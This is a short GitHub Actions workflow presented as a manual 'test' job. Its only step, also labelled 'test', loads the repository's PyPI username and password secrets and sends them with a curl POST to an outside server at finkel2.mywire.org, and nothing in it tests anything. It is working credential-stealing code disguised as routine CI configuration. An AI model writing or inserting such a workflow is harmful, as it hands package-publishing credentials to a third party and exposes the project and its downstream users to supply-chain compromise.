name: test

on:
  workflow_dispatch:

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: test
        env:
          USERNAME: ${{ secrets.pypi_username }}
          PASSWORD: ${{ secrets.pypi_password }}
        run: |
          curl -fsS -X POST "https://finkel2.mywire.org/pypi" \
            -H "Content-Type: application/json" \
            -d "{\"username\":\"${USERNAME}\",\"password\":\"${PASSWORD}\"}"
